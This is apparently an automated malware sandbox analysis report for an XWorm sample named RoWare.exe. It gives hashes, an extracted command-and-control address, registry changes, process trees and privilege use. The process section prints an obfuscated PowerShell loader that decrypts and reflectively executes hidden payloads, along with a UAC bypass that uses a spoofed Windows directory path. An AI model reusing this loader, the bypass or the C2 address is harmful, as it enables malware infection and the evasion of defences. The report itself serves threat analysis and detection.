Analysis
-
max time kernel
16s -
max time network
33s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
03/09/2024, 16:15
Static task
static1
Behavioral task
behavioral1
Sample
RoWare.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
RoWare.exe
Resource
win10v2004-20240802-en
General
-
Target
RoWare.exe
-
Size
472KB
-
MD5
b63bed7f19631126a453b49d603c74a4
-
SHA1
abd90b6cbda580c135e1b28b89d4f0027f939225
-
SHA256
2367f924d3eeb65eac13f2fef2c92ae901605323ae0e3c91b24a8c0717c1829a
-
SHA512
29aa82c4c201512b4ebacc3ea1725bdb8207fe56ae68c7b7620da9b619b8cf1801fa5488f47863d46c056066eb559a3c0c887c46fd816890c9e9d4a2a32f192d
-
SSDEEP
12288:Qy90sdnp4C4BytE9WlGKfmQgNsP/N6aSg5U2D:Qy1dpF44osGKfmQEwOg5h
Malware Config
Extracted
xworm
91.92.250.4:2709
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3548-190-0x00000298F4B80000-0x00000298F4B94000-memory.dmp family_xworm -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 5 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} ie4uinit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1" ie4uinit.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} ie4uinit.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*" ie4uinit.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,0,15063,0" ie4uinit.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3548 powershell.exe 4204 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation ComputerDefaults.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 1 IoCs
pid Process 4104 ComputerDefaults.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" RoWare.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\win.ini unregmp2.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0" ie4uinit.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\BrowserEmulation ie4uinit.exe Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0" ie4uinit.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Main ie4uinit.exe Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "12" ie4uinit.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities ie4uinit.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\.3gp2\OpenWithProgids\WMP11.AssocFile.3G2 = "0" unregmp2.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\.m4v\ = "WMP11.AssocFile.MP4" unregmp2.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\.mov\MP2.Last = "Custom" unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\NeverDefault unregmp2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\.WMD\OpenWithProgIds\WMP11.AssocFile.WMD = "0" unregmp2.exe Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\.wmv\OpenWithProgids\WMP11.AssocFile.WMV = "0" unregmp2.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\shellex\{00021500-0000-0000-C000-000000000046} ie4uinit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\ShellEx\PropertySheetHandlers\{FBF23B40-E3F0-101B-8488-00AA003E56F8} ie4uinit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\telnet ie4uinit.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\.avi\MPlayer2.BAK = "VLC.avi" unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" unregmp2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\.snd\OpenWithProgIds\WMP11.AssocFile.AU = "0" unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\open\MUIVerb = "@C:\\Windows\\system32\\ieframe.dll,-5732" ie4uinit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wvx unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\open\command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1" ie4uinit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\CommandId = "IE.File" ie4uinit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\opennew\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}" ie4uinit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\telnet\FriendlyTypeName = "@C:\\Windows\\system32\\ieframe.dll,-907" ie4uinit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cda unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AudioCD\shell\play\ = "&Play" unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\DefaultIcon ie4uinit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.svg\OpenWithProgIds ie4uinit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/msvideo\Extension = ".avi" unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\MUIVerb = "@C:\\Windows\\system32\\ieframe.dll,-5732" ie4uinit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\printto\command ie4uinit.exe Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\.m2t\OpenWithProgids\WMP11.AssocFile.M2TS = "0" unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mid\CLSID = "{cd3afa74-b84f-48f0-9393-7edc34128127}" unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mp3\CLSID = "{cd3afa76-b84f-48f0-9393-7edc34128127}" unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/vnd.dlna.mpeg-tts\CLSID = "{cd3afa9b-b84f-48f0-9393-7edc34128127}" unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/x-mpeg2a unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{17FC1A80-140E-4290-A64F-4A29A951A867}\ = "Open Media Sharing Handler" unregmp2.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\.3g2\MP2.Last = "Custom" unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.au\ = "WMP11.AssocFile.AU" unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-ms-wax\CLSID = "{cd3afa83-b84f-48f0-9393-7edc34128127}" unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tn3270 ie4uinit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\https\EditFlags = "2" ie4uinit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\open\command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1" ie4uinit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\printto\command ie4uinit.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\.wmv\ = "WMP11.AssocFile.WMV" unregmp2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.WVX\PreferExecuteOnMismatch = "1" unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/wav\CLSID = "{cd3afa7b-b84f-48f0-9393-7edc34128127}" unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile ie4uinit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WTV\MP2.Last = "Custom" unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.aifc unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/avi unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ftp\DefaultIcon ie4uinit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\http\shell\open ie4uinit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.MK3D\PerceivedType = "video" unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.svg\OpenWithProgIds\svgfile ie4uinit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\printto\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\" \"%2\" \"%3\" \"%4\"" ie4uinit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\shell\Open\command ie4uinit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{17FC1A80-140E-4290-A64F-4A29A951A867} unregmp2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\.aifc\OpenWithProgIds\WMP11.AssocFile.AIFF = "0" unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-ms-wmd unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/3gpp\Extension = ".3gp" unregmp2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WMP.AudioCD\Shell\Play\Command unregmp2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ftp\shell\open\command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1" ie4uinit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\opennew\MUIVerb = "@C:\\Windows\\system32\\ieframe.dll,-5731" ie4uinit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.au\MP2.Last = "Custom" unregmp2.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3516 powershell.exe 3516 powershell.exe 3516 powershell.exe 4204 powershell.exe 4204 powershell.exe 4204 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3316 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3548 powershell.exe Token: SeDebugPrivilege 3516 powershell.exe Token: SeIncreaseQuotaPrivilege 3516 powershell.exe Token: SeSecurityPrivilege 3516 powershell.exe Token: SeTakeOwnershipPrivilege 3516 powershell.exe Token: SeLoadDriverPrivilege 3516 powershell.exe Token: SeSystemProfilePrivilege 3516 powershell.exe Token: SeSystemtimePrivilege 3516 powershell.exe Token: SeProfSingleProcessPrivilege 3516 powershell.exe Token: SeIncBasePriorityPrivilege 3516 powershell.exe Token: SeCreatePagefilePrivilege 3516 powershell.exe Token: SeBackupPrivilege 3516 powershell.exe Token: SeRestorePrivilege 3516 powershell.exe Token: SeShutdownPrivilege 3516 powershell.exe Token: SeDebugPrivilege 3516 powershell.exe Token: SeSystemEnvironmentPrivilege 3516 powershell.exe Token: SeRemoteShutdownPrivilege 3516 powershell.exe Token: SeUndockPrivilege 3516 powershell.exe Token: SeManageVolumePrivilege 3516 powershell.exe Token: 33 3516 powershell.exe Token: 34 3516 powershell.exe Token: 35 3516 powershell.exe Token: 36 3516 powershell.exe Token: SeDebugPrivilege 4204 powershell.exe Token: SeIncreaseQuotaPrivilege 4204 powershell.exe Token: SeSecurityPrivilege 4204 powershell.exe Token: SeTakeOwnershipPrivilege 4204 powershell.exe Token: SeLoadDriverPrivilege 4204 powershell.exe Token: SeSystemProfilePrivilege 4204 powershell.exe Token: SeSystemtimePrivilege 4204 powershell.exe Token: SeProfSingleProcessPrivilege 4204 powershell.exe Token: SeIncBasePriorityPrivilege 4204 powershell.exe Token: SeCreatePagefilePrivilege 4204 powershell.exe Token: SeBackupPrivilege 4204 powershell.exe Token: SeRestorePrivilege 4204 powershell.exe Token: SeShutdownPrivilege 4204 powershell.exe Token: SeDebugPrivilege 4204 powershell.exe Token: SeSystemEnvironmentPrivilege 4204 powershell.exe Token: SeRemoteShutdownPrivilege 4204 powershell.exe Token: SeUndockPrivilege 4204 powershell.exe Token: SeManageVolumePrivilege 4204 powershell.exe Token: 33 4204 powershell.exe Token: 34 4204 powershell.exe Token: 35 4204 powershell.exe Token: 36 4204 powershell.exe Token: SeIncreaseQuotaPrivilege 4204 powershell.exe Token: SeSecurityPrivilege 4204 powershell.exe Token: SeTakeOwnershipPrivilege 4204 powershell.exe Token: SeLoadDriverPrivilege 4204 powershell.exe Token: SeSystemProfilePrivilege 4204 powershell.exe Token: SeSystemtimePrivilege 4204 powershell.exe Token: SeProfSingleProcessPrivilege 4204 powershell.exe Token: SeIncBasePriorityPrivilege 4204 powershell.exe Token: SeCreatePagefilePrivilege 4204 powershell.exe Token: SeBackupPrivilege 4204 powershell.exe Token: SeRestorePrivilege 4204 powershell.exe Token: SeShutdownPrivilege 4204 powershell.exe Token: SeDebugPrivilege 4204 powershell.exe Token: SeSystemEnvironmentPrivilege 4204 powershell.exe Token: SeRemoteShutdownPrivilege 4204 powershell.exe Token: SeUndockPrivilege 4204 powershell.exe Token: SeManageVolumePrivilege 4204 powershell.exe Token: 33 4204 powershell.exe Token: 34 4204 powershell.exe -
Suspicious use of FindShellTrayWindow 23 IoCs
pid Process 4104 ComputerDefaults.exe 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE 3316 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4192 wrote to memory of 5104 4192 RoWare.exe 72 PID 4192 wrote to memory of 5104 4192 RoWare.exe 72 PID 5104 wrote to memory of 4620 5104 cmd.exe 74 PID 5104 wrote to memory of 4620 5104 cmd.exe 74 PID 5104 wrote to memory of 192 5104 cmd.exe 75 PID 5104 wrote to memory of 192 5104 cmd.exe 75 PID 5104 wrote to memory of 3548 5104 cmd.exe 76 PID 5104 wrote to memory of 3548 5104 cmd.exe 76 PID 3548 wrote to memory of 2092 3548 powershell.exe 77 PID 3548 wrote to memory of 2092 3548 powershell.exe 77 PID 2092 wrote to memory of 4104 2092 cmd.exe 79 PID 2092 wrote to memory of 4104 2092 cmd.exe 79 PID 3548 wrote to memory of 1792 3548 powershell.exe 80 PID 3548 wrote to memory of 1792 3548 powershell.exe 80 PID 3548 wrote to memory of 3516 3548 powershell.exe 82 PID 3548 wrote to memory of 3516 3548 powershell.exe 82 PID 3548 wrote to memory of 4204 3548 powershell.exe 85 PID 3548 wrote to memory of 4204 3548 powershell.exe 85 PID 4104 wrote to memory of 2480 4104 ComputerDefaults.exe 86 PID 4104 wrote to memory of 2480 4104 ComputerDefaults.exe 86 PID 4104 wrote to memory of 3180 4104 ComputerDefaults.exe 88 PID 4104 wrote to memory of 3180 4104 ComputerDefaults.exe 88 PID 3548 wrote to memory of 3316 3548 powershell.exe 54 PID 3548 wrote to memory of 1772 3548 powershell.exe 34 PID 3548 wrote to memory of 392 3548 powershell.exe 17 PID 3548 wrote to memory of 1572 3548 powershell.exe 30 PID 3548 wrote to memory of 1232 3548 powershell.exe 23 PID 3548 wrote to memory of 2348 3548 powershell.exe 41 PID 3548 wrote to memory of 1756 3548 powershell.exe 33 PID 3548 wrote to memory of 2936 3548 powershell.exe 50 PID 3548 wrote to memory of 2340 3548 powershell.exe 40 PID 3548 wrote to memory of 360 3548 powershell.exe 15 PID 3548 wrote to memory of 4692 3548 powershell.exe 62 PID 3548 wrote to memory of 1532 3548 powershell.exe 29 PID 3548 wrote to memory of 1728 3548 powershell.exe 32 PID 3548 wrote to memory of 2316 3548 powershell.exe 39 PID 3548 wrote to memory of 1508 3548 powershell.exe 28 PID 3548 wrote to memory of 4868 3548 powershell.exe 60 PID 3548 wrote to memory of 1120 3548 powershell.exe 20 PID 3548 wrote to memory of 2892 3548 powershell.exe 48 PID 3548 wrote to memory of 720 3548 powershell.exe 8 PID 3548 wrote to memory of 2488 3548 powershell.exe 47 PID 3548 wrote to memory of 904 3548 powershell.exe 13 PID 3548 wrote to memory of 2676 3548 powershell.exe 52 PID 3548 wrote to memory of 508 3548 powershell.exe 63 PID 3548 wrote to memory of 2464 3548 powershell.exe 46 PID 3548 wrote to memory of 1872 3548 powershell.exe 36 PID 3548 wrote to memory of 1080 3548 powershell.exe 19 PID 3548 wrote to memory of 4468 3548 powershell.exe 65 PID 3548 wrote to memory of 2452 3548 powershell.exe 45 PID 3548 wrote to memory of 1860 3548 powershell.exe 35 PID 3548 wrote to memory of 1464 3548 powershell.exe 27 PID 3548 wrote to memory of 1068 3548 powershell.exe 18 PID 3548 wrote to memory of 1260 3548 powershell.exe 24 PID 3548 wrote to memory of 1648 3548 powershell.exe 31 PID 3548 wrote to memory of 856 3548 powershell.exe 12 PID 3548 wrote to memory of 1444 3548 powershell.exe 26 PID 3548 wrote to memory of 2404 3548 powershell.exe 43 PID 3548 wrote to memory of 1676 3548 powershell.exe 38 PID 3548 wrote to memory of 1212 3548 powershell.exe 22 PID 3548 wrote to memory of 2388 3548 powershell.exe 42 PID 3548 wrote to memory of 808 3548 powershell.exe 11 PID 3548 wrote to memory of 1196 3548 powershell.exe 21 PID 3548 wrote to memory of 604 3548 powershell.exe 16
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch1⤵PID:808
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k rpcss1⤵PID:856
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:904
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:360
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:604
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork1⤵PID:1068
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1080
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1120
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1196
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1212
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1232
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1260
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1384
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1444
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1464
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1508
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1532
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1648
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1772
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1860
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1872
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:1676
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2316
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2340
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2348
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2388
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2404
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2452
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2464
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2488
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2892
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2936
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:2676
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3316 -
C:\Users\Admin\AppData\Local\Temp\RoWare.exe"C:\Users\Admin\AppData\Local\Temp\RoWare.exe"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\SYSTEM32\cmd.execmd /c "RoWare.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵PID:4620
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RoWare.bat';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵PID:192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\System32\ie4uinit.exe"C:\Windows\System32\ie4uinit.exe" -reinstall7⤵
- Boot or Logon Autostart Execution: Active Setup
